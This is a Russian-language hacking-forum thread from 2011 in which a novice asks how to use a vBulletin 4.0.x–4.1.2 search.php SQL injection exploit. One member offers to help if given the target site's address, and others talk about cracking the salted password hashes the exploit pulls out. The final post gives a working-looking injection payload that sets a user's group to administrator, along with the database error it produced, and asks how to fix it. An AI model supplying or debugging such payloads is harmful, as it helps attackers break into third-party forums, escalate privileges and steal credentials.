vBulletin 4.0.x => 4.1.2 exploit помощ нужна!

Discussion in 'Песочница' started by Smesh, 7 Jun 2011.

  1. Smesh

    Smesh New Member

    Joined:
    28 May 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок

    vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
     
  2. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    говори адрес сайта, помогу)
     
  3. ra0cg

    ra0cg Elder - Старейшина

    Joined:
    9 Nov 2008
    Messages:
    809
    Likes Received:
    500
    Reputations:
    200
    Как вариант, просмотри видео "как уптреблят етот експлоит", к примеру с YouTube.
     
  4. Sh0ck3R

    Sh0ck3R New Member

    Joined:
    3 May 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    В каком формате получается пароль?(чтобы расшифровать)
     
  5. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Скорей всего в формате соленого хеша.
    На форуме есть тема, попробуй закинуть хеши туда, может, расшифруют.
     
    _________________________
  6. Export

    Export Member

    Joined:
    13 Feb 2010
    Messages:
    69
    Likes Received:
    5
    Reputations:
    9
    Какие еще запросы можно сделать?
    На все запросы вылазит ошибка
    Code:
    Database error in vBulletin 4.1.2:
    
    Invalid SQL:
    SELECT DISTINCT socialgroupcategory.title from socialgroupcategory AS
    				socialgroupcategory WHERE socialgroupcategoryid IN (1) UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';);
    
    MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';)' at line 2
    Error Number  : 1064
    Request Date  : Monday, June 20th 2011 @ 03:57:50 PM
    Error Date    : Monday, June 20th 2011 @ 03:57:50 PM
    Script        : http://localhost/search.php?do=process
    Referrer      : http://localhost/search.php
    IP Address    : 127.0.0.1
    Username      : 
    Classname     : vB_Database
    MySQL Version : 5.1.40-community
    Запрос SQL такой
    Code:
    &cat[0]=1) UPDATE user SET usergroupid=6 WHERE userid=2#
    В чем моя ошибка?
    PS Через Execute batch file в Navicat'e запрос проходит.
     
    #6 Export, 20 Jun 2011
    Last edited: 20 Jun 2011
Loading...